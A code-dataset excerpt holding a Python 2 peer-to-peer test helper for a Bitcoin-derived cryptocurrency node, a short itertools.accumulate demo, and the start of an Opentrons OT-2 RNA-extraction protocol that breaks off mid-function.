v = (c & 0xFFFFFFL) << (8 * (nbytes - 3))
return v
def deser_vector(f, c):
nit = struct.unpack("<B", f.read(1))[0]
if nit == 253:
nit = struct.unpack("<H", f.read(2))[0]
elif nit == 254:
nit = struct.unpack("<I", f.read(4))[0]
elif nit == 255:
nit = struct.unpack("<Q", f.read(8))[0]
r = []
for i in xrange(nit):
t = c()
t.deserialize(f)
r.append(t)
return r
def ser_vector(l):
r = b""
if len(l) < 253:
r = struct.pack("B", len(l))
elif len(l) < 0x10000:
r = struct.pack("<BH", 253, len(l))
elif len(l) < 0x100000000L:
r = struct.pack("<BI", 254, len(l))
else:
r = struct.pack("<BQ", 255, len(l))
for i in l:
r += i.serialize()
return r
def deser_uint256_vector(f):
nit = struct.unpack("<B", f.read(1))[0]
if nit == 253:
nit = struct.unpack("<H", f.read(2))[0]
elif nit == 254:
nit = struct.unpack("<I", f.read(4))[0]
elif nit == 255:
nit = struct.unpack("<Q", f.read(8))[0]
r = []
for i in xrange(nit):
t = deser_uint256(f)
r.append(t)
return r
def ser_uint256_vector(l):
r = b""
if len(l) < 253:
r = struct.pack("B", len(l))
elif len(l) < 0x10000:
r = struct.pack("<BH", 253, len(l))
elif len(l) < 0x100000000L:
r = struct.pack("<BI", 254, len(l))
else:
r = struct.pack("<BQ", 255, len(l))
for i in l:
r += ser_uint256(i)
return r
def deser_string_vector(f):
nit = struct.unpack("<B", f.read(1))[0]
if nit == 253:
nit = struct.unpack("<H", f.read(2))[0]
elif nit == 254:
nit = struct.unpack("<I", f.read(4))[0]
elif nit == 255:
nit = struct.unpack("<Q", f.read(8))[0]
r = []
for i in xrange(nit):
t = deser_string(f)
r.append(t)
return r
def ser_string_vector(l):
r = b""
if len(l) < 253:
r = struct.pack("B", len(l))
elif len(l) < 0x10000:
r = struct.pack("<BH", 253, len(l))
elif len(l) < 0x100000000L:
r = struct.pack("<BI", 254, len(l))
else:
r = struct.pack("<BQ", 255, len(l))
for sv in l:
r += ser_string(sv)
return r
def deser_int_vector(f):
nit = struct.unpack("<B", f.read(1))[0]
if nit == 253:
nit = struct.unpack("<H", f.read(2))[0]
elif nit == 254:
nit = struct.unpack("<I", f.read(4))[0]
elif nit == 255:
nit = struct.unpack("<Q", f.read(8))[0]
r = []
for i in xrange(nit):
t = struct.unpack("<i", f.read(4))[0]
r.append(t)
return r
def ser_int_vector(l):
r = b""
if len(l) < 253:
r = struct.pack("B", len(l))
elif len(l) < 0x10000:
r = struct.pack("<BH", 253, len(l))
elif len(l) < 0x100000000L:
r = struct.pack("<BI", 254, len(l))
else:
r = struct.pack("<BQ", 255, len(l))
for i in l:
r += struct.pack("<i", i)
return r
# Deserialize from a hex string representation (eg from RPC)
def FromHex(obj, hex_string):
obj.deserialize(BytesIO(unhexlify(hex_string.encode('ascii'))))
return obj
# Convert a binary-serializable object to hex (eg for submission via RPC)
def ToHex(obj):
return hexlify(obj.serialize()).decode('ascii')
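# For example (derived from the message classes defined below, shown only as a
# sanity check): ToHex(msg_ping(nonce=1)) == '0100000000000000' and
# FromHex(msg_ping(), '0100000000000000').nonce == 1.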
# Objects that map to gmcd objects, which can be serialized/deserialized
class CAddress(object):
def __init__(self):
self.nServices = 1
self.pchReserved = b"\x00" * 10 + b"\xff" * 2
self.ip = "0.0.0.0"
self.port = 0
def deserialize(self, f):
self.nServices = struct.unpack("<Q", f.read(8))[0]
self.pchReserved = f.read(12)
self.ip = socket.inet_ntoa(f.read(4))
self.port = struct.unpack(">H", f.read(2))[0]
def serialize(self):
r = b""
r += struct.pack("<Q", self.nServices)
r += self.pchReserved
r += socket.inet_aton(self.ip)
r += struct.pack(">H", self.port)
return r
def __repr__(self):
return "CAddress(nServices=%i ip=%s port=%i)" % (self.nServices,
self.ip, self.port)
class CInv(object):
typemap = {
0: "Error",
1: "TX",
2: "Block"}
def __init__(self, t=0, h=0L):
self.type = t
self.hash = h
def deserialize(self, f):
self.type = struct.unpack("<i", f.read(4))[0]
self.hash = deser_uint256(f)
def serialize(self):
r = b""
r += struct.pack("<i", self.type)
r += ser_uint256(self.hash)
return r
def __repr__(self):
return "CInv(type=%s hash=%064x)" \
% (self.typemap[self.type], self.hash)
class CBlockLocator(object):
def __init__(self):
self.nVersion = MY_VERSION
self.vHave = []
def deserialize(self, f):
self.nVersion = struct.unpack("<i", f.read(4))[0]
self.vHave = deser_uint256_vector(f)
def serialize(self):
r = b""
r += struct.pack("<i", self.nVersion)
r += ser_uint256_vector(self.vHave)
return r
def __repr__(self):
return "CBlockLocator(nVersion=%i vHave=%s)" \
% (self.nVersion, repr(self.vHave))
class COutPoint(object):
def __init__(self, hash=0, n=0):
self.hash = hash
self.n = n
def deserialize(self, f):
self.hash = deser_uint256(f)
self.n = struct.unpack("<I", f.read(4))[0]
def serialize(self):
r = b""
r += ser_uint256(self.hash)
r += struct.pack("<I", self.n)
return r
def __repr__(self):
return "COutPoint(hash=%064x n=%i)" % (self.hash, self.n)
class CTxIn(object):
def __init__(self, outpoint=None, scriptSig=b"", nSequence=0):
if outpoint is None:
self.prevout = COutPoint()
else:
self.prevout = outpoint
self.scriptSig = scriptSig
self.nSequence = nSequence
def deserialize(self, f):
self.prevout = COutPoint()
self.prevout.deserialize(f)
self.scriptSig = deser_string(f)
self.nSequence = struct.unpack("<I", f.read(4))[0]
def serialize(self):
r = b""
r += self.prevout.serialize()
r += ser_string(self.scriptSig)
r += struct.pack("<I", self.nSequence)
return r
def __repr__(self):
return "CTxIn(prevout=%s scriptSig=%s nSequence=%i)" \
% (repr(self.prevout), hexlify(self.scriptSig),
self.nSequence)
class CTxOut(object):
def __init__(self, nValue=0, scriptPubKey=b""):
self.nValue = nValue
self.scriptPubKey = scriptPubKey
def deserialize(self, f):
self.nValue = struct.unpack("<q", f.read(8))[0]
self.scriptPubKey = deser_string(f)
def serialize(self):
r = b""
r += struct.pack("<q", self.nValue)
r += ser_string(self.scriptPubKey)
return r
def __repr__(self):
return "CTxOut(nValue=%i.%08i scriptPubKey=%s)" \
% (self.nValue // COIN, self.nValue % COIN,
hexlify(self.scriptPubKey))
class CTransaction(object):
def __init__(self, tx=None):
if tx is None:
self.nVersion = 1
self.vin = []
self.vout = []
self.nLockTime = 0
self.sha256 = None
self.hash = None
else:
self.nVersion = tx.nVersion
self.vin = copy.deepcopy(tx.vin)
self.vout = copy.deepcopy(tx.vout)
self.nLockTime = tx.nLockTime
self.sha256 = None
self.hash = None
def deserialize(self, f):
self.nVersion = struct.unpack("<i", f.read(4))[0]
self.vin = deser_vector(f, CTxIn)
self.vout = deser_vector(f, CTxOut)
self.nLockTime = struct.unpack("<I", f.read(4))[0]
self.sha256 = None
self.hash = None
def serialize(self):
r = b""
r += struct.pack("<i", self.nVersion)
r += ser_vector(self.vin)
r += ser_vector(self.vout)
r += struct.pack("<I", self.nLockTime)
return r
def rehash(self):
self.sha256 = None
self.calc_sha256()
def calc_sha256(self):
if self.sha256 is None:
self.sha256 = uint256_from_str(hash256(self.serialize()))
self.hash = encode(hash256(self.serialize())[::-1], 'hex_codec').decode('ascii')
def is_valid(self):
self.calc_sha256()
for tout in self.vout:
if tout.nValue < 0 or tout.nValue > 21000000 * COIN:
return False
return True
def __repr__(self):
return "CTransaction(nVersion=%i vin=%s vout=%s nLockTime=%i)" \
% (self.nVersion, repr(self.vin), repr(self.vout), self.nLockTime)
class CBlockHeader(object):
def __init__(self, header=None):
if header is None:
self.set_null()
else:
self.nVersion = header.nVersion
self.hashPrevBlock = header.hashPrevBlock
self.hashMerkleRoot = header.hashMerkleRoot
self.nTime = header.nTime
self.nBits = header.nBits
self.nNonce = header.nNonce
self.sha256 = header.sha256
self.hash = header.hash
self.calc_sha256()
def set_null(self):
self.nVersion = 1
self.hashPrevBlock = 0
self.hashMerkleRoot = 0
self.nTime = 0
self.nBits = 0
self.nNonce = 0
self.sha256 = None
self.hash = None
def deserialize(self, f):
self.nVersion = struct.unpack("<i", f.read(4))[0]
self.hashPrevBlock = deser_uint256(f)
self.hashMerkleRoot = deser_uint256(f)
self.nTime = struct.unpack("<I", f.read(4))[0]
self.nBits = struct.unpack("<I", f.read(4))[0]
self.nNonce = struct.unpack("<I", f.read(4))[0]
self.sha256 = None
self.hash = None
def serialize(self):
r = b""
r += struct.pack("<i", self.nVersion)
r += ser_uint256(self.hashPrevBlock)
r += ser_uint256(self.hashMerkleRoot)
r += struct.pack("<I", self.nTime)
r += struct.pack("<I", self.nBits)
r += struct.pack("<I", self.nNonce)
return r
def calc_sha256(self):
if self.sha256 is None:
r = b""
r += struct.pack("<i", self.nVersion)
r += ser_uint256(self.hashPrevBlock)
r += ser_uint256(self.hashMerkleRoot)
r += struct.pack("<I", self.nTime)
r += struct.pack("<I", self.nBits)
r += struct.pack("<I", self.nNonce)
self.sha256 = uint256_from_str(globalmovementclubhash(r))
self.hash = encode(globalmovementclubhash(r)[::-1], 'hex_codec').decode('ascii')
def rehash(self):
self.sha256 = None
self.calc_sha256()
return self.sha256
def __repr__(self):
return "CBlockHeader(nVersion=%i hashPrevBlock=%064x hashMerkleRoot=%064x nTime=%s nBits=%08x nNonce=%08x)" \
% (self.nVersion, self.hashPrevBlock, self.hashMerkleRoot,
time.ctime(self.nTime), self.nBits, self.nNonce)
class CBlock(CBlockHeader):
def __init__(self, header=None):
super(CBlock, self).__init__(header)
self.vtx = []
def deserialize(self, f):
super(CBlock, self).deserialize(f)
self.vtx = deser_vector(f, CTransaction)
def serialize(self):
r = b""
r += super(CBlock, self).serialize()
r += ser_vector(self.vtx)
return r
def calc_merkle_root(self):
hashes = []
for tx in self.vtx:
tx.calc_sha256()
hashes.append(ser_uint256(tx.sha256))
while len(hashes) > 1:
newhashes = []
for i in xrange(0, len(hashes), 2):
i2 = min(i+1, len(hashes)-1)
newhashes.append(hash256(hashes[i] + hashes[i2]))
hashes = newhashes
return uint256_from_str(hashes[0])
def is_valid(self):
self.calc_sha256()
target = uint256_from_compact(self.nBits)
if self.sha256 > target:
return False
for tx in self.vtx:
if not tx.is_valid():
return False
if self.calc_merkle_root() != self.hashMerkleRoot:
return False
return True
def solve(self):
self.rehash()
target = uint256_from_compact(self.nBits)
while self.sha256 > target:
self.nNonce += 1
self.rehash()
def __repr__(self):
return "CBlock(nVersion=%i hashPrevBlock=%064x hashMerkleRoot=%064x nTime=%s nBits=%08x nNonce=%08x vtx=%s)" \
% (self.nVersion, self.hashPrevBlock, self.hashMerkleRoot,
time.ctime(self.nTime), self.nBits, self.nNonce, repr(self.vtx))
class CUnsignedAlert(object):
def __init__(self):
self.nVersion = 1
self.nRelayUntil = 0
self.nExpiration = 0
self.nID = 0
self.nCancel = 0
self.setCancel = []
self.nMinVer = 0
self.nMaxVer = 0
self.setSubVer = []
self.nPriority = 0
self.strComment = b""
self.strStatusBar = b""
self.strReserved = b""
def deserialize(self, f):
self.nVersion = struct.unpack("<i", f.read(4))[0]
self.nRelayUntil = struct.unpack("<q", f.read(8))[0]
self.nExpiration = struct.unpack("<q", f.read(8))[0]
self.nID = struct.unpack("<i", f.read(4))[0]
self.nCancel = struct.unpack("<i", f.read(4))[0]
self.setCancel = deser_int_vector(f)
self.nMinVer = struct.unpack("<i", f.read(4))[0]
self.nMaxVer = struct.unpack("<i", f.read(4))[0]
self.setSubVer = deser_string_vector(f)
self.nPriority = struct.unpack("<i", f.read(4))[0]
self.strComment = deser_string(f)
self.strStatusBar = deser_string(f)
self.strReserved = deser_string(f)
def serialize(self):
r = b""
r += struct.pack("<i", self.nVersion)
r += struct.pack("<q", self.nRelayUntil)
r += struct.pack("<q", self.nExpiration)
r += struct.pack("<i", self.nID)
r += struct.pack("<i", self.nCancel)
r += ser_int_vector(self.setCancel)
r += struct.pack("<i", self.nMinVer)
r += struct.pack("<i", self.nMaxVer)
r += ser_string_vector(self.setSubVer)
r += struct.pack("<i", self.nPriority)
r += ser_string(self.strComment)
r += ser_string(self.strStatusBar)
r += ser_string(self.strReserved)
return r
def __repr__(self):
return "CUnsignedAlert(nVersion %d, nRelayUntil %d, nExpiration %d, nID %d, nCancel %d, nMinVer %d, nMaxVer %d, nPriority %d, strComment %s, strStatusBar %s, strReserved %s)" \
% (self.nVersion, self.nRelayUntil, self.nExpiration, self.nID,
self.nCancel, self.nMinVer, self.nMaxVer, self.nPriority,
self.strComment, self.strStatusBar, self.strReserved)
class CAlert(object):
def __init__(self):
self.vchMsg = b""
self.vchSig = b""
def deserialize(self, f):
self.vchMsg = deser_string(f)
self.vchSig = deser_string(f)
def serialize(self):
r = b""
r += ser_string(self.vchMsg)
r += ser_string(self.vchSig)
return r
def __repr__(self):
return "CAlert(vchMsg.sz %d, vchSig.sz %d)" \
% (len(self.vchMsg), len(self.vchSig))
# Objects that correspond to messages on the wire
class msg_version(object):
command = b"version"
def __init__(self):
self.nVersion = MY_VERSION
self.nServices = 1
self.nTime = int(time.time())
self.addrTo = CAddress()
self.addrFrom = CAddress()
self.nNonce = random.getrandbits(64)
self.strSubVer = MY_SUBVERSION
self.nStartingHeight = -1
def deserialize(self, f):
self.nVersion = struct.unpack("<i", f.read(4))[0]
if self.nVersion == 10300:
self.nVersion = 300
self.nServices = struct.unpack("<Q", f.read(8))[0]
self.nTime = struct.unpack("<q", f.read(8))[0]
self.addrTo = CAddress()
self.addrTo.deserialize(f)
if self.nVersion >= 106:
self.addrFrom = CAddress()
self.addrFrom.deserialize(f)
self.nNonce = struct.unpack("<Q", f.read(8))[0]
self.strSubVer = deser_string(f)
if self.nVersion >= 209:
self.nStartingHeight = struct.unpack("<i", f.read(4))[0]
else:
self.nStartingHeight = None
else:
self.addrFrom = None
self.nNonce = None
self.strSubVer = None
self.nStartingHeight = None
def serialize(self):
r = b""
r += struct.pack("<i", self.nVersion)
r += struct.pack("<Q", self.nServices)
r += struct.pack("<q", self.nTime)
r += self.addrTo.serialize()
r += self.addrFrom.serialize()
r += struct.pack("<Q", self.nNonce)
r += ser_string(self.strSubVer)
r += struct.pack("<i", self.nStartingHeight)
return r
def __repr__(self):
return 'msg_version(nVersion=%i nServices=%i nTime=%s addrTo=%s addrFrom=%s nNonce=0x%016X strSubVer=%s nStartingHeight=%i)' \
% (self.nVersion, self.nServices, time.ctime(self.nTime),
repr(self.addrTo), repr(self.addrFrom), self.nNonce,
self.strSubVer, self.nStartingHeight)
class msg_verack(object):
command = b"verack"
def __init__(self):
pass
def deserialize(self, f):
pass
def serialize(self):
return b""
def __repr__(self):
return "msg_verack()"
class msg_addr(object):
command = b"addr"
def __init__(self):
self.addrs = []
def deserialize(self, f):
self.addrs = deser_vector(f, CAddress)
def serialize(self):
return ser_vector(self.addrs)
def __repr__(self):
return "msg_addr(addrs=%s)" % (repr(self.addrs))
class msg_alert(object):
command = b"alert"
def __init__(self):
self.alert = CAlert()
def deserialize(self, f):
self.alert = CAlert()
self.alert.deserialize(f)
def serialize(self):
r = b""
r += self.alert.serialize()
return r
def __repr__(self):
return "msg_alert(alert=%s)" % (repr(self.alert), )
class msg_inv(object):
command = b"inv"
def __init__(self, inv=None):
if inv is None:
self.inv = []
else:
self.inv = inv
def deserialize(self, f):
self.inv = deser_vector(f, CInv)
def serialize(self):
return ser_vector(self.inv)
def __repr__(self):
return "msg_inv(inv=%s)" % (repr(self.inv))
class msg_getdata(object):
command = b"getdata"
def __init__(self, inv=None):
self.inv = inv if inv != None else []
def deserialize(self, f):
self.inv = deser_vector(f, CInv)
def serialize(self):
return ser_vector(self.inv)
def __repr__(self):
return "msg_getdata(inv=%s)" % (repr(self.inv))
class msg_getblocks(object):
command = b"getblocks"
def __init__(self):
self.locator = CBlockLocator()
self.hashstop = 0L
def deserialize(self, f):
self.locator = CBlockLocator()
self.locator.deserialize(f)
self.hashstop = deser_uint256(f)
def serialize(self):
r = b""
r += self.locator.serialize()
r += ser_uint256(self.hashstop)
return r
def __repr__(self):
return "msg_getblocks(locator=%s hashstop=%064x)" \
% (repr(self.locator), self.hashstop)
class msg_tx(object):
command = b"tx"
def __init__(self, tx=CTransaction()):
self.tx = tx
def deserialize(self, f):
self.tx.deserialize(f)
def serialize(self):
return self.tx.serialize()
def __repr__(self):
return "msg_tx(tx=%s)" % (repr(self.tx))
class msg_block(object):
command = b"block"
def __init__(self, block=None):
if block is None:
self.block = CBlock()
else:
self.block = block
def deserialize(self, f):
self.block.deserialize(f)
def serialize(self):
return self.block.serialize()
def __repr__(self):
return "msg_block(block=%s)" % (repr(self.block))
class msg_getaddr(object):
command = b"getaddr"
def __init__(self):
pass
def deserialize(self, f):
pass
def serialize(self):
return b""
def __repr__(self):
return "msg_getaddr()"
class msg_ping_prebip31(object):
command = b"ping"
def __init__(self):
pass
def deserialize(self, f):
pass
def serialize(self):
return b""
def __repr__(self):
return "msg_ping() (pre-bip31)"
class msg_ping(object):
command = b"ping"
def __init__(self, nonce=0L):
self.nonce = nonce
def deserialize(self, f):
self.nonce = struct.unpack("<Q", f.read(8))[0]
def serialize(self):
r = b""
r += struct.pack("<Q", self.nonce)
return r
def __repr__(self):
return "msg_ping(nonce=%08x)" % self.nonce
class msg_pong(object):
command = b"pong"
def __init__(self, nonce=0):
self.nonce = nonce
def deserialize(self, f):
self.nonce = struct.unpack("<Q", f.read(8))[0]
def serialize(self):
r = b""
r += struct.pack("<Q", self.nonce)
return r
def __repr__(self):
return "msg_pong(nonce=%08x)" % self.nonce
class msg_mempool(object):
command = b"mempool"
def __init__(self):
pass
def deserialize(self, f):
pass
def serialize(self):
return b""
def __repr__(self):
return "msg_mempool()"
class msg_sendheaders(object):
command = b"sendheaders"
def __init__(self):
pass
def deserialize(self, f):
pass
def serialize(self):
return b""
def __repr__(self):
return "msg_sendheaders()"
# getheaders message has
# number of entries
# vector of hashes
# hash_stop (hash of last desired block header, 0 to get as many as possible)
class msg_getheaders(object):
command = b"getheaders"
def __init__(self):
self.locator = CBlockLocator()
self.hashstop = 0L
def deserialize(self, f):
self.locator = CBlockLocator()
self.locator.deserialize(f)
self.hashstop = deser_uint256(f)
def serialize(self):
r = b""
r += self.locator.serialize()
r += ser_uint256(self.hashstop)
return r
def __repr__(self):
return "msg_getheaders(locator=%s, stop=%064x)" \
% (repr(self.locator), self.hashstop)
# headers message has
# <count> <vector of block headers>
class msg_headers(object):
command = b"headers"
def __init__(self):
self.headers = []
def deserialize(self, f):
# comment in gmcd indicates these should be deserialized as blocks
blocks = deser_vector(f, CBlock)
for x in blocks:
self.headers.append(CBlockHeader(x))
def serialize(self):
blocks = [CBlock(x) for x in self.headers]
return ser_vector(blocks)
def __repr__(self):
return "msg_headers(headers=%s)" % repr(self.headers)
class msg_reject(object):
command = b"reject"
REJECT_MALFORMED = 1
def __init__(self):
self.message = b""
self.code = 0
self.reason = b""
self.data = 0L
def deserialize(self, f):
self.message = deser_string(f)
self.code = struct.unpack("<B", f.read(1))[0]
self.reason = deser_string(f)
if (self.code != self.REJECT_MALFORMED and
(self.message == b"block" or self.message == b"tx")):
self.data = deser_uint256(f)
def serialize(self):
r = ser_string(self.message)
r += struct.pack("<B", self.code)
r += ser_string(self.reason)
if (self.code != self.REJECT_MALFORMED and
(self.message == b"block" or self.message == b"tx")):
r += ser_uint256(self.data)
return r
def __repr__(self):
return "msg_reject: %s %d %s [%064x]" \
% (self.message, self.code, self.reason, self.data)
# Helper function
def wait_until(predicate, attempts=float('inf'), timeout=float('inf')):
attempt = 0
elapsed = 0
while attempt < attempts and elapsed < timeout:
with mininode_lock:
if predicate():
return True
attempt += 1
elapsed += 0.05
time.sleep(0.05)
return False
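# Example (sketch): poll a callback flag roughly every 50 ms for up to 10 s:
#   assert wait_until(lambda: test_node.verack_received, timeout=10)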
# This is what a callback should look like for NodeConn
# Reimplement the on_* functions to provide handling for events
class NodeConnCB(object):
def __init__(self):
self.verack_received = False
# deliver_sleep_time is helpful for debugging race conditions in p2p
# tests; it causes message delivery to sleep for the specified time
# before acquiring the global lock and delivering the next message.
self.deliver_sleep_time = None
def set_deliver_sleep_time(self, value):
with mininode_lock:
self.deliver_sleep_time = value
def get_deliver_sleep_time(self):
with mininode_lock:
return self.deliver_sleep_time
# Spin until verack message is received from the node.
# Tests may want to use this as a signal that the test can begin.
# This can be called from the testing thread, so it needs to acquire the
# global lock.
def wait_for_verack(self):
while True:
with mininode_lock:
if self.verack_received:
return
time.sleep(0.05)
def deliver(self, conn, message):
deliver_sleep = self.get_deliver_sleep_time()
if deliver_sleep is not None:
time.sleep(deliver_sleep)
with mininode_lock:
try:
getattr(self, 'on_' + message.command)(conn, message)
except:
print "ERROR delivering %s (%s)" % (repr(message),
sys.exc_info()[0])
def on_version(self, conn, message):
if message.nVersion >= 209:
conn.send_message(msg_verack())
conn.ver_send = min(MY_VERSION, message.nVersion)
if message.nVersion < 209:
conn.ver_recv = conn.ver_send
def on_verack(self, conn, message):
conn.ver_recv = conn.ver_send
self.verack_received = True
def on_inv(self, conn, message):
want = msg_getdata()
for i in message.inv:
if i.type != 0:
want.inv.append(i)
if len(want.inv):
conn.send_message(want)
def on_addr(self, conn, message): pass
def on_alert(self, conn, message): pass
def on_getdata(self, conn, message): pass
def on_getblocks(self, conn, message): pass
def on_tx(self, conn, message): pass
def on_block(self, conn, message): pass
def on_getaddr(self, conn, message): pass
def on_headers(self, conn, message): pass
def on_getheaders(self, conn, message): pass
def on_ping(self, conn, message):
if conn.ver_send > BIP0031_VERSION:
conn.send_message(msg_pong(message.nonce))
def on_reject(self, conn, message): pass
def on_close(self, conn): pass
def on_mempool(self, conn): pass
def on_pong(self, conn, message): pass
# More useful callbacks and functions for NodeConnCB's which have a single NodeConn
class SingleNodeConnCB(NodeConnCB):
def __init__(self):
NodeConnCB.__init__(self)
self.connection = None
self.ping_counter = 1
self.last_pong = msg_pong()
def add_connection(self, conn):
self.connection = conn
# Wrapper for the NodeConn's send_message function
def send_message(self, message):
self.connection.send_message(message)
def on_pong(self, conn, message):
self.last_pong = message
# Sync up with the node
def sync_with_ping(self, timeout=30):
def received_pong():
return (self.last_pong.nonce == self.ping_counter)
self.send_message(msg_ping(nonce=self.ping_counter))
success = wait_until(received_pong, timeout)
self.ping_counter += 1
return success
# The actual NodeConn class
# This class provides an interface for a p2p connection to a specified node
class NodeConn(asyncore.dispatcher):
messagemap = {
b"version": msg_version,
b"verack": msg_verack,
b"addr": msg_addr,
b"alert": msg_alert,
b"inv": msg_inv,
b"getdata": msg_getdata,
b"getblocks": msg_getblocks,
b"tx": msg_tx,
b"block": msg_block,
b"getaddr": msg_getaddr,
b"ping": msg_ping,
b"pong": msg_pong,
b"headers": msg_headers,
b"getheaders": msg_getheaders,
b"reject": msg_reject,
b"mempool": msg_mempool,
}
MAGIC_BYTES = {
"mainnet": b"\xbf\x0c\x6b\xbd", # mainnet
"testnet3": b"\xce\xe2\xca\xff", # testnet3
"regtest": b"\xfc\xc1\xb7\xdc" # regtest
}
def __init__(self, dstaddr, dstport, rpc, callback, net="regtest", services=1):
asyncore.dispatcher.__init__(self, map=mininode_socket_map)
self.log = logging.getLogger("NodeConn(%s:%d)" % (dstaddr, dstport))
self.dstaddr = dstaddr
self.dstport = dstport
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.sendbuf = b""
self.recvbuf = b""
self.ver_send = 209
self.ver_recv = 209
self.last_sent = 0
self.state = "connecting"
self.network = net
self.cb = callback
self.disconnect = False
# stuff version msg into sendbuf
vt = msg_version()
vt.nServices = services
vt.addrTo.ip = self.dstaddr
vt.addrTo.port = self.dstport
vt.addrFrom.ip = "0.0.0.0"
vt.addrFrom.port = 0
self.send_message(vt, True)
print 'MiniNode: Connecting to GlobalMovementClub Node IP # ' + dstaddr + ':' \
+ str(dstport)
try:
self.connect((dstaddr, dstport))
except:
self.handle_close()
self.rpc = rpc
def show_debug_msg(self, msg):
self.log.debug(msg)
def handle_connect(self):
self.show_debug_msg("MiniNode: Connected & Listening: \n")
self.state = "connected"
def handle_close(self):
self.show_debug_msg("MiniNode: Closing Connection to %s:%d... "
% (self.dstaddr, self.dstport))
self.state = "closed"
self.recvbuf = b""
self.sendbuf = b""
try:
self.close()
except:
pass
self.cb.on_close(self)
def handle_read(self):
try:
t = self.recv(8192)
if len(t) > 0:
self.recvbuf += t
self.got_data()
except:
pass
def readable(self):
return True
def writable(self):
with mininode_lock:
length = len(self.sendbuf)
return (length > 0)
def handle_write(self):
with mininode_lock:
try:
sent = self.send(self.sendbuf)
except:
self.handle_close()
return
self.sendbuf = self.sendbuf[sent:]
def got_data(self):
try:
while True:
if len(self.recvbuf) < 4:
return
if self.recvbuf[:4] != self.MAGIC_BYTES[self.network]:
raise ValueError("got garbage %s" % repr(self.recvbuf))
if self.ver_recv < 209:
if len(self.recvbuf) < 4 + 12 + 4:
return
command = self.recvbuf[4:4+12].split(b"\x00", 1)[0]
msglen = struct.unpack("<i", self.recvbuf[4+12:4+12+4])[0]
checksum = None
if len(self.recvbuf) < 4 + 12 + 4 + msglen:
return
msg = self.recvbuf[4+12+4:4+12+4+msglen]
self.recvbuf = self.recvbuf[4+12+4+msglen:]
else:
if len(self.recvbuf) < 4 + 12 + 4 + 4:
return
command = self.recvbuf[4:4+12].split(b"\x00", 1)[0]
msglen = struct.unpack("<i", self.recvbuf[4+12:4+12+4])[0]
checksum = self.recvbuf[4+12+4:4+12+4+4]
if len(self.recvbuf) < 4 + 12 + 4 + 4 + msglen:
return
msg = self.recvbuf[4+12+4+4:4+12+4+4+msglen]
th = sha256(msg)
h = sha256(th)
if checksum != h[:4]:
raise ValueError("got bad checksum " + repr(self.recvbuf))
self.recvbuf = self.recvbuf[4+12+4+4+msglen:]
if command in self.messagemap:
f = BytesIO(msg)
t = self.messagemap[command]()
t.deserialize(f)
self.got_message(t)
else:
self.show_debug_msg("Unknown command: '" + command + "' " +
repr(msg))
except Exception as e:
print 'got_data:', repr(e)
def send_message(self, message, pushbuf=False):
if self.state != "connected" and not pushbuf:
return
self.show_debug_msg("Send %s" % repr(message))
command = message.command
data = message.serialize()
tmsg = self.MAGIC_BYTES[self.network]
tmsg += command
tmsg += b"\x00" * (12 - len(command))
tmsg += struct.pack("<I", len(data))
if self.ver_send >= 209:
th = sha256(data)
h = sha256(th)
tmsg += h[:4]
tmsg += data
with mininode_lock:
self.sendbuf += tmsg
self.last_sent = time.time()
def got_message(self, message):
if message.command == b"version":
if message.nVersion <= BIP0031_VERSION:
self.messagemap[b'ping'] = msg_ping_prebip31
if self.last_sent + 30 * 60 < time.time():
self.send_message(self.messagemap[b'ping']())
self.show_debug_msg("Recv %s" % repr(message))
self.cb.deliver(self, message)
def disconnect_node(self):
self.disconnect = True
class NetworkThread(Thread):
def run(self):
while mininode_socket_map:
# We check for whether to disconnect outside of the asyncore
# loop to workaround the behavior of asyncore when using
# select
disconnected = []
for fd, obj in mininode_socket_map.items():
if obj.disconnect:
disconnected.append(obj)
[ obj.handle_close() for obj in disconnected ]
asyncore.loop(0.1, use_poll=True, map=mininode_socket_map, count=1)
# An exception we can raise if we detect a potential disconnect
# (p2p or rpc) before the test is complete
class EarlyDisconnectError(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
| 29.240658 | 184 | 0.571235 |
36ccdfc9408f44a83650f8df3b4de8eac6b8533c | 302 | py | Python | itertools_accumulate.py | DahlitzFlorian/article-introduction-to-itertools-snippets | 07803f568e8e11c96a42c140b1aca8fcbf71c93e | ["MIT"] | 3 | 2020-03-12T21:42:59.000Z | 2020-03-18T02:42:22.000Z | itertools_accumulate.py | DahlitzFlorian/article-introduction-to-itertools-snippets | 07803f568e8e11c96a42c140b1aca8fcbf71c93e | ["MIT"] | null | null | null | itertools_accumulate.py | DahlitzFlorian/article-introduction-to-itertools-snippets | 07803f568e8e11c96a42c140b1aca8fcbf71c93e | ["MIT"] | null | null | null |
from itertools import accumulate
from operator import mul
numbers = [1, 2, 3, 4, 5]
result1 = accumulate(numbers)
result2 = accumulate(numbers, mul)
result3 = accumulate(numbers, initial=100)
print(f"Result 1: {list(result1)}")
print(f"Result 2: {list(result2)}")
print(f"Result 3: {list(result3)}")
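# Expected output (accumulate() yields running totals; the binary function
# defaults to addition, and initial= -- available since Python 3.8 -- prepends
# a starting value):
# Result 1: [1, 3, 6, 10, 15]
# Result 2: [1, 2, 6, 24, 120]
# Result 3: [100, 101, 103, 106, 110, 115]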
| 25.166667 | 42 | 0.725166 |
24bb4aa9ecdf5bd8a9e89ffd359137a9805b77c9 | 11,926 | py | Python | SARS CoV-2/INATIVOS/Extração MagMax COVID - STARLAB.py | biogerm-pt/OT-2 | fed24f06db0ee19216a1f793482f588f07e3762a | ["Apache-2.0"] | null | null | null | SARS CoV-2/INATIVOS/Extração MagMax COVID - STARLAB.py | biogerm-pt/OT-2 | fed24f06db0ee19216a1f793482f588f07e3762a | ["Apache-2.0"] | null | null | null | SARS CoV-2/INATIVOS/Extração MagMax COVID - STARLAB.py | biogerm-pt/OT-2 | fed24f06db0ee19216a1f793482f588f07e3762a | ["Apache-2.0"] | null | null | null |
from opentrons.types import Point
import json
import os
import math
import threading
from time import sleep
metadata = {
'protocolName': 'USO_v6_station_b_M300_Pool_magmax',
'author': 'Nick <ndiehl@opentrons.com',
'apiLevel': '2.3'
}
NUM_SAMPLES = 96 # start with 8 samples, slowly increase to 48, then 94 (max is 64)
ELUTION_VOL = 50
STARTING_VOL = 540
WASH_VOL = 500
POOL = False
TIP_TRACK = False
PARK = True
# Definitions for deck light flashing
class CancellationToken:
def __init__(self):
self.is_continued = False
def set_true(self):
self.is_continued = True
def set_false(self):
self.is_continued = False
def turn_on_blinking_notification(hardware, pause):
while pause.is_continued:
hardware.set_lights(rails=True)
sleep(1)
hardware.set_lights(rails=False)
sleep(1)
def create_thread(ctx, cancel_token):
